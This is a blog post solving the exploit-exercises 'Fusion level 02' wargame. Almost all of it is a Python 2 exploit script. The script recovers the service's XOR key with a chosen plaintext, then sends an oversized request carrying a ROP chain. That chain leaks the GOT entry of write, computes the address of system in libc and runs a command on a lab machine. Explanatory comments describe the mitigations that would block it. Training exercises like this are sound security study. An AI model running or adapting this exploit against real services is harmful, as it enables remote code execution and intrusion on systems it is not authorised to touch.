Computer Security/WarGame
[exploit-exercises] Fusion level 02
tunz
2013. 7. 9. 18:09
# Python 2 exploit script for the exploit-exercises "Fusion" level 02 target
# (Python 2 is evident from the `print` statements and from `str` being used
# as a byte string throughout).
#
# Defensive reading: every address below is a fixed constant for one specific
# target build, and the final libc arithmetic assumes one specific libc.  A
# position-independent build, address randomisation or full RELRO (read-only
# GOT) would each invalidate the assumptions this script relies on.
from socket import *
from struct import *
import time


def cipher(s,key):
    """Return `s` XORed byte-by-byte with the 128-byte `key`.

    The key index wraps at 128 (``key[i%128]``), so inputs longer than the
    key reuse it cyclically.  XOR is its own inverse, so the same function
    both encodes and decodes.  Operates on Python 2 ``str`` objects.
    """
    i=0
    after=""
    while i<len(s):
        after += chr(ord(s[i])^ ord(key[i%128]))
        i=i+1
    return after

# Hard-coded target-binary addresses (32-bit, little-endian per the '<I'
# pack format used below).  Names suggest PLT entries for read/write, a
# pop;pop;pop;pop;ret gadget, a .bss scratch area and the GOT slot of write;
# the actual meaning is inferred from the names only and is not verifiable
# from this file alone.
read = 0x8048860
write = 0x080489c0
ppppr = 0x80499bc
bss = 0x0804b520
write_got = 0x804b3dc

# Connect to the lab VM; the address and port are specific to the author's
# test environment.
s = socket(AF_INET, SOCK_STREAM)
s.connect(('192.168.197.130',20002))
time.sleep(1)
s.recv(1024)

# First request: send 128 NUL bytes under the "E" command.  The service
# echoes back an enciphered copy; because the plaintext is all zeros, the
# reply *is* the XOR key.  (This is why a fixed-key XOR stream offers no
# confidentiality once a chosen plaintext is available.)
msg="\x00"*128
s.send("E"+pack('<I',len(msg))+msg)
s.recv(121)
size=unpack('<I',s.recv(4))[0]   # length prefix of the reply; read but otherwise unused
s.recv(1)
key = ""
while len(key) < 128:
    key += s.recv(1024)           # accumulate until the full 128-byte key is in hand
print "[+] Get xor key"

# Second request: an oversized "E" message.  131088 filler bytes are followed
# by a sequence of 4-byte little-endian values that overwrite saved control
# data; the bounds check that should have rejected this length is the
# underlying defect being exercised.
cmd="id\x00"
payload = "A"*131088
payload += pack('<I',read)
payload += pack('<I',ppppr+1)
payload += pack('<I',0)
payload += pack('<I',bss)
payload += pack('<I',len(cmd))
payload += pack('<I',write)
payload += pack('<I',ppppr+1)
payload += pack('<I',1)
payload += pack('<I',write_got)
payload += pack('<I',4)
payload += pack('<I',read)
payload += pack('<I',ppppr+1)
payload += pack('<I',0)
payload += pack('<I',write_got)
payload += pack('<I',4)
payload += pack('<I',write) # the GOT slot of write is rewritten above, so this call resolves elsewhere
payload += "AAAA"
payload += pack('<I',bss)

# The service applies the same XOR to incoming data, so the payload is
# pre-enciphered with the recovered key to arrive as intended.
payload = cipher(payload,key)
s.send("E"+pack('<I',len(payload))+payload)
s.recv(121)
total=0
while total < len(payload):
    total += len(s.recv(65000))   # drain the echoed copy before continuing

# "Q" ends the command loop; the remaining exchanges feed the chain above:
# the command string, then a 4-byte read of write's GOT entry, then the
# computed replacement pointer.
s.send("Q")
s.send(cmd)
get = s.recv(4)
# NOTE(review): a short read is padded with the ASCII character '0' (0x30),
# not a NUL byte, and on the little-endian low side -- a partial recv() here
# would therefore decode to an unrelated value rather than the real address.
write_addr = unpack('<I',"0"*(4-len(get))+get)[0]
# Fixed offsets for one particular libc build (presumably write vs. system
# within that libc -- not verifiable from this file); any other libc version
# gives a different result.
system_addr = write_addr - 0xc12c0 + 0x3cb20
print "[+] System: "+hex(system_addr)
s.send(pack('<I',system_addr))
print s.recv(1024)
s.close()